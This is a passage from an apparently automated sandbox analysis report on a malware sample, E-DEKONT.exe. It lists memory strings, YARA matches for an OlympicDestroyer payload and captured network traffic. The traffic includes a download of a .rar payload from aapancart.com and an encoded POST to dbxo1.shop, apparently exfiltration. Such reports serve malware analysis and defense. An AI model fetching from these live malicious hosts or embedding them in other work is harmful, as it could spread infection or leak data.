found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
                  Source: E-DEKONT.exe, 00000004.00000001.108602358770.0000000000626000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
                  Source: mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                  Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                  Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aapancart.com/DOHx
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aapancart.com/qO
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rarzJ
                  Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                  Source: 444685002784711619507383.tmp.4.drString found in binary or memory: https://login.live.com/
                  Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.drString found in binary or memory: https://login.live.com//
                  Source: 444685002784711619507383.tmp.4.drString found in binary or memory: https://login.live.com/https://login.live.com/
                  Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.drString found in binary or memory: https://login.live.com/v104
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: unknownHTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
                  Source: unknownDNS traffic detected: queries for: aapancart.com
                  Source: global trafficHTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
                  Source: unknownHTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405425

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: E-DEKONT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00404C621_2_00404C62
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00406ADD1_2_00406ADD
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_004072B41_2_004072B4
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B804ED1_2_02B804ED
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B623051_2_02B62305
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66CB51_2_02B66CB5
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B690921_2_02B69092
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6D49E1_2_02B6D49E
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66E851_2_02B66E85
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B672881_2_02B67288
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66EF61_2_02B66EF6
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B684E11_2_02B684E1
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66CCE1_2_02B66CCE
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B670201_2_02B67020
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B83A1C1_2_02B83A1C
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B850121_2_02B85012
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B828731_2_02B82873
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66E561_2_02B66E56
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B8525A1_2_02B8525A
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B67E581_2_02B67E58
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B673941_2_02B67394
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B807901_2_02B80790
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B801961_2_02B80196
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66DF31_2_02B66DF3
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66FCB1_2_02B66FCB
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B80D361_2_02B80D36
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B623291_2_02B62329
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66D121_2_02B66D12
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6230C1_2_02B6230C
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6850C1_2_02B6850C
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B83D611_2_02B83D61
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66F691_2_02B66F69
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B691421_2_02B69142
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B623481_2_02B62348
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B671481_2_02B67148
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 4_2_0168530A4_2_0168530A
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 4_2_016852924_2_01685292
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 4_2_016852944_2_01685294
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B84F02 NtProtectVirtualMemory,1_2_02B84F02
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-conio-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-private-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.drStatic PE information: No import functions for PE file found
                  Source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108910048005.000000001DDD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
